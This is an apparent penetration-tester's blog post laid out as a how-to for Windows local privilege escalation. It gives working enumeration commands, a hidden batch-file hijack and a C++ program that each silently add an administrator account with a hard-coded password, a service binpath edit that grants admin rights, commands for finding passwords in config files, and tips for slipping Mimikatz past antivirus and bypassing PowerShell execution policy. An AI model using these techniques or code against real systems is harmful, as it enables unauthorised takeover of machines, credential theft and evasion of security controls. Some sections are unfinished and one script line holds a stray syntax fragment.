First some links with some good primers;
A big list of vectors https://attack.mitre.org/wiki/Privilege_Escalation
Some good walkthroughs; https://toshellandback.com/2015/11/24/ms-priv-esc/ https://www.fuzzysecurity.com/tutorials/16.html
Finally something that gave me good ideas, I will expand upon these below. I couldn't get this to work due to missing DLL entrypoints on my chosen exe's; https://www.gracefulsecurity.com/privesc-dll-hijacking/
I am making this blog post as a reference for myself and others, and it'll be long, so I am trying out a table of contents;
Table of Contents
- Recon and Scanning
- Gaining access
- Maintaining access
- Impersonation
- Hidden services
- Hidden tasks
- Defeating next gen or app whitelisting
Recon and Scanning
Passive and active recon and scanning for windows privilege escalation takes a lot of forms. I am going to assume you've already found your way onto a host. If not you can do this through packet sniffing, some social engineering, or a leg-up in your red team engagement... I will probably do an article just on this later.I am a fan of living off the land. Use the tools that are already installed. There are some that will make this easy, but could increase the likelihood of getting caught or simply not work due to app-whitelisting etc.
Look on the root of the drives with; icacls c:\* /C
You are looking for the below, (modify, Write and Full control respectively, obviously a group your account is a member of)
NT AUTHORITY\Authenticated Users:(M)
BUILTIN\Users:(W)
or either of those with a (F)
Then you'll need to got through subdirectories in a similar fashion. You can add a /T, but it makes it hard to find write locations with too much info.
The other option here is to use a tool from Microsoft's Sysinternals called accesschk. I've found some interesting behavior between the -d (directory) and without the -d. Without the -d it will find folders on the root of the drive.
accesschk.exe -uwdqs Users c:\
accesschk.exe -uwdqs "Authenticated Users" c:\
accesschk.exe -uwqs Users c:\*.*
accesschk.exe -uwqs "Authenticated Users" c:\*.*
accesschk.exe -kwsu hklm\system\currentcontrolset\services #look for writeable reg keys for services, to add your process.
It might be easier here to look for other files;
accesschk.exe -uwqs Users c:\*.bat
accesschk.exe -uwqs Users c:\*.cmd
accesschk.exe -uwqs Users c:\*.dll
accesschk.exe -uwqs Users c:\*.ini
There are lots of ways to escalate privileges on Windows... like a lot. But this one I wanted to put first though, as it isn't one I've seen before... it is so simple I am not sure why. I don't know if this has a name, but as I was also looking at an application that was vulnerable to DLL hijacking when I discovered it, so I've simply called it this (if it is known as something else let me know);
Script Hijacking
To understand this, you need to know how windows calls processes. As in some of the other attacks, it is all about local directory first, then the path variable is used from left to right. If you do an echo %path% you get the following;C:\WINDOWS\system32;C:\WINDOWS;C:\WINDOWS\System32\Wbem;C:\WINDOWS\System32\WindowsPowerShell\v1.0\;. If you have write access to that first directory you are golden, but you can keep going down the list, as long as it is a exe or script that doesn't exist in one of these other folders, you are in. You don't even have to use an exe here, a batch file, or cmd will work.
This attack exploits the path windows takes by simply beating out finding the real executable, go for the local path first.
If you find a script calls another executable and you have write access in the directory that script resides then depending on how that script is called, you could get yourself privilege escalation. Eg if you find an everyone writable directory, and inside is a startup.bat, restart.cmd or similar, and inside that user readable batch file is a call to timeout, ping, taskkill etc, and you have write access to that directory you can add a batch file called that process (eg taskkill.bat) and pass on the commands that were being sent to the true process via the full path (just to be nice so their script doesn't bomb), eg;
I found startup.bat in c:\somefolder, I have create/append to this folder, but the files themselves are marked as read only.
Inside startup.bat is a bunch of things, mainly setting some paths and variables. At the bottom of this script it calls the actual exe that is the same folder. I assume this script is run in group policy or as a scheduled task, or hardcoded to run from another executable. I didn't have local admin, but I can see the server is listening on the port that is defined in one of the variables... a good sign the exe is called with admin or system.
Just above the exe being run is;
timeout /t 5
Awesome. I don't have write to the startup.bat, but I do to the c:\somefolder (of course I could have just echo'd out path and hit one of those directories). I create a file called timeout.bat and make it hidden. Inside timeout.bat I put the below. The nice thing about the below... you can put it in any type of call, ping, tskill, taskkill, cscript, wscript etc... basically anything that has an exe in c:\windows\system32 and it will still run that bit, so no one will likely be any the wiser as the script will still work. It also gives us some details on what called it, when, and with which user.
@echo off
c:\windows\system32\%~n0.exe %1 %2 %3 %4 %5
echo %username% %time% %date% %1 %2 %3 %4 %5 %~dpnx0 >> C:\users\myuser\%~n0.txt
net user ms-admin PW-Privesc#1 /add ", 0);
net localgroup Administrators ms-admin /add
Wait for next reboot, or in my case when the scheduled task ran and likely you'll have a shiny new local admin to use, if not at least you'll have the username your script was called with. In my case, less than an hour later I had local admin.
Exploiting the path
This one should probably go to the top as all the others use this trick. But essentially the %path% variable, is a system and user variable that is used for windows to find executables, dll's and scripts.Nltest hash passing
Stolen from here https://twitter.com/sysopfb/status/986799053668139009Basically Nltest /server:ip-of-kali-box /query
Dll Hijacking
This is mentioned here https://www.gracefulsecurity.comI initially had issues getting this to work, but we press on.
Essentially you want to find a folder that your have write to that has an EXE that is being called by an administrative user. Eg a service. Then you need either write access to that folder, or one of the folders in the system path. Then you need to find a DLL's that your target exe is calling. If that DLL doesn't exist in the local directory and you have write, put it there. If it doesn't exist on the system at all, you just need to put it in the path folder you have write to.
This is the dll I found through using dependency walker and filemon. Winmm.dll, is a pretty common DLL for dll hijacking, so it is useful to have one. Once the vendor responds I'll put my working code below and on my github for reference. I eventually found this one, that gave me some ideas; https://packetstormsecurity.com/files/93108/PuTTY-0.60-DLL-Hijacking-Exploit.html
But this is the one along with some stuff I picked up along the way cinched it; https://gist.github.com/felmoltor/488115c684463dfbbbf7555024cb4d12
Here is my final one; https://github.com/secme/Node/blob/master/Winmm.cpp. There are some big apps that are vulnerable to this, including the server-side implementation of NodeJs.exe. I've reported this to the node team in April 2018, but they've not prioritised it as a big issue.
Unquoted Paths
This one is kinda fun. Essentially you are looking for a service or even something likely to be run as admin\system that has a space in the path and no quotes around it. So a lnk file, or a service are your best bet.Run the below to find a service that is vulnerable;
wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\\" |findstr /i /v """
Lets say it returns c:\program files\secure service\version 12\service.exe. Then you simply need to create an exe that takes the name of one of the folders before it's space, depending on where you have write access. Say you have write access to c:\ you could simply drop in a program.exe and see what you catch... likely something. The system will alert users to this files existence too.
Most likely though you won't have write to c:\ but you may to "c:\program files\", so you could in the above case put an exe in there called secure.exe, further still in the above case you could put version.exe in c:\program files\secure service\ and get the same result.
I used to use iexpress for this, but in my testing it doesn't like having more commands thrown at it, eg calling c:\program files errors out trying to call the program.exe with "files".
Bat2Exe is good; http://www.f2ko.de/en/b2e.php, however a lot of AV will tend to pick files converted in this way up.
So fire-up notepad++ and save the following into a file called exe-test.cpp, should compile with MinGW-w64
/* Author: Morgan Storey (@MorganKStorey)
g++ -c exe-test.cpp & g++ -o test.exe exe-test.o
Really simple, just adds a local admin.
To do, add output to a log file so you can see what user etc called it... knowledge is power
*/
#include <windows.h>
int main(void)
{
WinExec("cmd.exe /c net user ms-admin PW-PrivEsc#1 /add ", 0);
Sleep(3000);
WinExec("cmd.exe /c net localgroup Administrators ms-admin /add ", 0);
Sleep(2000);
return 0;
};
Git here; https://github.com/secme/Program.exe/blob/master/program.cpp
Service editing
For this you are going to have to use a 3rd party tool, though it is made by sysinternals, now owned by Microsoft, so I doubt it'll get picked up;accesschk.exe -uwcqv "Authenticated Users" * /accepteula
accesschk.exe -uwcqv "Everyone" * /accepteula
You can also just open regedit and go to the below section of the registry, sometimes the registry permissions are changed and even if you don't have the permissions above you have them in the registry.
HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\services
The plan here of course is to edit a service and run the command you need.
Something like sc config VulnerableService binpath= "cmd /c
net localgroup Administrators youruser /add" #note the space after the = symbol.
Or just change the binpath in the registry and then wait for the service to start. Now you have a shiny new admin to do bad with.
Other poor permissions I've seen and used
Profiles
Used to be pretty common in the WinXP days to find the startup folder for all users be set to all users having write access. Not so much with Win7+But have a look here, C:\Users\Public\Desktop\ if you have write you could modify an existing LNK file to point to a script or exe you need the admin to run... basically fishing at this point. Or better yet put it in the all users startmenu; C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup and when/if they logon you are good.
App Folders
Specific app folders like c:\python, c:\java, cygwin etc, are rife with these.Sysprep hangovers
XML files, look through them for passwords etc. At most they'll be encoded. Their can be autologin users in the registry too.Poor Config files
findstr /si password *.txt *.ini *.log *.xml *.cfg *.conffindstr /si administrator *.txt *.ini *.log *.xml *.cfg *.conf
Scheduled Tasks
By default scheduled tasks have an ACL that locks them down to the creator. Sometimes people will break this and give you an in to repoint the task to your own script, or simply replace the script it is point to.Startup items
Like the title says, startup scripts, etc.These are super easy. Look for scripts referenced to the local policy, in the startup folder in the user profiles, even desktop.ini in folders can be used to leverage this.
Driver hooking
Work in progress
3rd Party tools
I love "living off the land", but sometimes you need a 3rd party tool as nothing else works.0-day
There are lots of 0-day and responsibly disclosed bugs with tools to techniques exposed on how to do privilege escalation in windows.Tavis Ormandy dropped this as it was patched in August 2019, of course patches aren't always installed soooo https://googleprojectzero.blogspot.com/2019/08/down-rabbit-hole.html
SandboxEscaper has unfortunately taken down all her POC's but they were all patched too, after she dropped them on Twitter.
Her original github here; https://github.com/SandboxEscaper
Pcap/Wireshark etc
Yep there are vulnerabilities in Wireshark. But here I am more talking about setting up a capture to capture a user with higher privileges username and password, more doable than most realise. Especially when Winpcap now helpfully adds the tickbox, would you like other users to be able to run the service.Mimikatz
First you're likely going to need to know how to bypass execution policy... there are loads of ways (or the old "powershell –ExecutionPolicy Bypass".Then you'll need to bypass Mimikatz being detected by AV...you can literally just go through the codebase before you compile your custom version and find/replace katz for dogz to get past most signature based av.
Msfvenom
Work in progressIncognito
Work in progressPassthehash
Work in progressSysret
This one only works when the patch for MS12-042 hasn't been applied.https://pentestlab.blog/2017/06/14/intel-sysret/ has a good rundown, essentially hook a running process to get into ring0 and run your command prompt there. Do a tasklist and find an explorer.exe, if its pid is 1234 run; sysret -pid 1234
Impersonation
These technically aren't privilege escalation, they are a way to move laterally. But putting them here as they work. I will likely split this out into a separate blog post.Terminal services
This involves taking over another users session.Work in progress
CVE-2024-26218
Work in progresshttps://github.com/exploits-forsale/CVE-2024-26218
https://gbhackers.com/windows-kernel-eop-exploit-released/
